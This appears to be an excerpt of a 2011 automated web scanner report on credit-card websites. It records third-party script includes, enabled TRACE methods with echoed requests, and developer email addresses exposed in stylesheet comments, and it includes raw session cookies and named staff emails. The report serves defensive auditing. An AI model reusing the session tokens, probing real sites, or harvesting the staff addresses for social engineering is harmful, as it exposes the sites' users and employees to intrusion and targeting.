<script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...

16.10. http://www.creditcards.com/points-rewards.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/points-rewards.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.bkrtx.com/js/bk-static.js

Request

GET /points-rewards.php HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308311486

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:26 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 44201

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Points Rewards Credit Cards - CreditCards.com</title>
<meta name="key
...[SNIP]...
</iframe>
<script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...

16.11. https://www.discovercard.com/cardmembersvcs/acqs/app/exec previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/acqs/app/exec

Issue detail

The response dynamically includes the following scripts from other domains:

https://https.edge.ru4.com/smartserve/ad?placement=pt-2008-099&invocation=0
https://https.edge.ru4.com/smartserve/ad?placement=pt-2594-001&invocation=0&forcejs&cat=stud01&application_id=&type=apply01
https://sales.liveperson.net/hc/71384334/x.js?cmd=file&file=chatScript3&site=71384334
https://sales.liveperson.net/hcp/html/DynamicButtonScript2.js

Request

POST /cardmembersvcs/acqs/app/exec HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
Content-Length: 1086
Cache-Control: max-age=0
Origin: https://www.discovercard.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313810|session#1308313730257-773381#1308315610|disable#browser%20timeout#1308317346

rebuttalEmailIndicatorInput=false&firstNameInput=&middleNameInput=&lastNameInput=&suffixInput=&emailInput=&displayEsignInput=&homeStreetAddress1Input=&homeStreetAddress2Input=&homeCityInput=&homeState
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:29:57 GMT
Server: Apache
x-wily-info: Clear guid=9D9444FA0A07140C59125912464F87E0
x-wily-servlet: Encrypt1 U+w0Pb5QTikwsT8iugvWOJNu7fg/9GyIIBtkAOCoPV3XLJ8bKoAP5Qp4UeZYQhg/EOPPu3f/MWLkbqeCF94+ffXlkdXToIemaij8eitKNxYVnSX84prIlAieVCVl3mCloLlJhr6obl/4Ye19y44eB5yYnNXNk4EO+simsERXK6TADthgUSpN3bo6FU/OktNT
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 133601

                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
                           <html>

                               <head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<IFRAME width="1" height="1" scrolling="no" frameborder="0" src="https://https.edge.ru4.com/smartserve/ad?placement=pt-2008-099&invocation=1000"><SCRIPT src="https://https.edge.ru4.com/smartserve/ad?placement=pt-2008-099&invocation=0"></SCRIPT>
...[SNIP]...
</script>
           <script type="text/javascript" src="https://sales.liveperson.net/hc/71384334/x.js?cmd=file&file=chatScript3&site=71384334"></script>
...[SNIP]...
</noscript>

           <script type="text/javascript" src="https://sales.liveperson.net/hcp/html/DynamicButtonScript2.js"></script>
...[SNIP]...

                                           <SCRIPT src="https://https.edge.ru4.com/smartserve/ad?placement=pt-2594-001&invocation=0&forcejs&cat=stud01&application_id=&type=apply01"></SCRIPT>
...[SNIP]...

16.12. https://www.discovercard.com/cardmembersvcs/acqs/app/getapp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/acqs/app/getapp

Issue detail

The response dynamically includes the following scripts from other domains:

https://https.edge.ru4.com/smartserve/ad?placement=pt-2008-099&invocation=0
https://https.edge.ru4.com/smartserve/ad?placement=pt-2594-001&invocation=0&forcejs&cat=stud01&application_id=&type=apply01
https://sales.liveperson.net/hc/71384334/x.js?cmd=file&file=chatScript3&site=71384334
https://sales.liveperson.net/hcp/html/DynamicButtonScript2.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:42 GMT
Server: Apache
x-wily-info: Clear guid=9D931E570A07140C5912591240530E5F
x-wily-servlet: Encrypt1 U+w0Pb5QTikwsT8iugvWOJNu7fg/9GyIIBtkAOCoPV3XLJ8bKoAP5Qp4UeZYQhg/EOPPu3f/MWLkbqeCF94+ffXlkdXToIemaij8eitKNxYVnSX84prIlAieVCVl3mCloLlJhr6obl/4Ye19y44eB5yYnNXNk4EO+simsERXK6TADthgUSpN3bo6FU/OktNT
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 118880

                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
                           <html>

                               <head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<IFRAME width="1" height="1" scrolling="no" frameborder="0" src="https://https.edge.ru4.com/smartserve/ad?placement=pt-2008-099&invocation=1000"><SCRIPT src="https://https.edge.ru4.com/smartserve/ad?placement=pt-2008-099&invocation=0"></SCRIPT>
...[SNIP]...
</script>
           <script type="text/javascript" src="https://sales.liveperson.net/hc/71384334/x.js?cmd=file&file=chatScript3&site=71384334"></script>
...[SNIP]...
</noscript>

           <script type="text/javascript" src="https://sales.liveperson.net/hcp/html/DynamicButtonScript2.js"></script>
...[SNIP]...

                                           <SCRIPT src="https://https.edge.ru4.com/smartserve/ad?placement=pt-2594-001&invocation=0&forcejs&cat=stud01&application_id=&type=apply01"></SCRIPT>
...[SNIP]...

16.13. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The response dynamically includes the following script from another domain:

http://static.atgsvcs.com/js/atgsvcs.js

Request

Response

16.14. https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/simplycash-business-credit-card/apply/42732-9-0

Issue detail

The response dynamically includes the following scripts from other domains:

https://static.atgsvcs.com/js/atgsvcs.js
https://www2.tmvtp.com/allocator/execute/16864380935772981099

Request

Response

16.15. https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue detail

The response dynamically includes the following script from another domain:

https://static.atgsvcs.com/js/atgsvcs.js

Request

Response

17. TRACE method is enabled previous next
There are 5 instances of this issue:

http://blogs.creditcards.com/
http://integrate.112.2o7.net/
http://spotlight.creditcards.com/
https://wtp101.com/
http://www262.americanexpress.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

17.1. http://blogs.creditcards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.creditcards.com
Path:	/

Request

TRACE / HTTP/1.0
Host: blogs.creditcards.com
Cookie: 8ad7897e72a648b1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:49 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blogs.creditcards.com
Cookie: 8ad7897e72a648b1; CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f4
...[SNIP]...

17.2. http://integrate.112.2o7.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://integrate.112.2o7.net
Path:	/

Request

TRACE / HTTP/1.0
Host: integrate.112.2o7.net
Cookie: e225f8a0dd99d06

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:28 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: integrate.112.2o7.net
Cookie: e225f8a0dd99d06; s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD9
...[SNIP]...

17.3. http://spotlight.creditcards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spotlight.creditcards.com
Path:	/

Request

TRACE / HTTP/1.0
Host: spotlight.creditcards.com
Cookie: 1eb3703691d4ef23

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:56 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: spotlight.creditcards.com
Cookie: 1eb3703691d4ef23; OAID=aaa441a9105b309385d19a81a43e09ae; CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311
...[SNIP]...

17.4. https://wtp101.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://wtp101.com
Path:	/

Request

TRACE / HTTP/1.0
Host: wtp101.com
Cookie: 6b90fd0715c827f3

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:33:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8o
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: wtp101.com
Cookie: 6b90fd0715c827f3; tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b

17.5. http://www262.americanexpress.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www262.americanexpress.com
Cookie: e3ada92a22de9235

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:02 GMT
Server: IBM_HTTP_Server
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www262.americanexpress.com
Cookie: e3ada92a22de9235; ngaopen_JSESSIONID=0000gt4-I_vhKTUhtGyUxxjVVVe:1525ki9ra; SaneID=173.193.214.243-1308311996862975

18. Email addresses disclosed previous next
There are 26 instances of this issue:

http://blogs.creditcards.com/s_code.js
http://www.capitalone.com/css/global/portal_base.css
http://www.capitalone.com/css/global/portal_common.css
http://www.capitalone.com/css/global/portal_grid.css
http://www.capitalone.com/css/global/portal_print.css
http://www.capitalone.com/css/page-type/portal_landing-accordion.css
http://www.capitalone.com/css/page-type/portal_product.css
http://www.capitalone.com/css/portal_footer.css
http://www.capitalone.com/css/portal_header.css
http://www.capitalone.com/css/portal_page-nav-heading.css
http://www.capitalone.com/js/global/portal_cof.js
https://www.citicards.com/cards/acq/Apply.do
http://www.discovercard.com/scripts/src/discover/liveSearch.js
http://www.discovercard.com/scripts/src/mcd/dom.js
http://www.discovercard.com/scripts/src/mcd/event.js
https://www.discovercard.com/cardmembersvcs/acqs/app/exec
https://www.discovercard.com/cardmembersvcs/acqs/app/getapp
https://www.discovercard.com/discover/jscripts/acquisitions/discover/acqs/applicationForm.js
https://www.discovercard.com/discover/jscripts/acquisitions/discover/acqs/cardSelector.js
https://www.discovercard.com/discover/jscripts/acquisitions/discover/acqs/rebuttalWindow.js
https://www.discovercard.com/discover/stylesheets/acquisitions/overlay.css
https://www.discovercard.com/scripts/src/discover/universal-overlay.js
https://www.discovercard.com/scripts/src/mcd/dom.js
https://www.discovercard.com/scripts/src/mcd/event.js
https://www.discovercard.com/scripts/src/mcd/http.js
https://www.discovercard.com/scripts/src/mcd/util.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

18.1. http://blogs.creditcards.com/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.creditcards.com
Path:	/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Us.tc

Request

Response

18.2. http://www.capitalone.com/css/global/portal_base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_base.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/global/portal_base.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_80=828974346.29215.0000; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:10 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 11:59:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5294
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Reset
----------------------------------------------------------------------------------------------------*/
b
...[SNIP]...

18.3. http://www.capitalone.com/css/global/portal_common.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_common.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/global/portal_common.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_80=828974346.29215.0000; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:10 GMT
Server: Apache
Last-Modified: Wed, 11 May 2011 14:14:47 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 11:59:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 27261
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Common Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

@import url("rr-disclosures.css");

/* =Common styles used across multiple page types
---------------------------------
...[SNIP]...

18.4. http://www.capitalone.com/css/global/portal_grid.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_grid.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/global/portal_grid.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_80=828974346.29215.0000; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:10 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 11:59:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 8218
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Grid Style Sheet - Based on 960.gs
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Grid Containers - 960 Grid System
-----------------------------------------------------------------------------
...[SNIP]...

18.5. http://www.capitalone.com/css/global/portal_print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_print.css

Issue detail

The following email address was disclosed in the response:

james.steincamp@capitalone.com

Request

GET /css/global/portal_print.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_80=828974346.29215.0000; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:12 GMT
Server: Apache
Last-Modified: Wed, 11 May 2011 14:14:47 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 11:59:12 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 9601
Content-Type: text/css

/*-----------------------------------------------------------------------------
Capital One Print Style Sheet
version: 1.0
author: James Steincamp
e-mail: james.steincamp@capitalone.com
-----------------------------------------------------------------------------*/

/* =Reset
-----------------------------------------------------------------------------*/
body {
background: #ff
...[SNIP]...

18.6. http://www.capitalone.com/css/page-type/portal_landing-accordion.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_landing-accordion.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/page-type/portal_landing-accordion.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_80=828974346.29215.0000; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:12 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Expires: Sat, 18 Jun 2011 11:59:12 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 2555
Content-Type: text/css

/*-----------------------------------------------------------------------------
Landing Page w/ Accordion Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

#page-content {
   margin-top: 19px;
}
#page-content #section-1 {
   height: 340px;
   margin-bottom: 25px;
}

/*
...[SNIP]...

18.7. http://www.capitalone.com/css/page-type/portal_product.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_product.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/page-type/portal_product.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
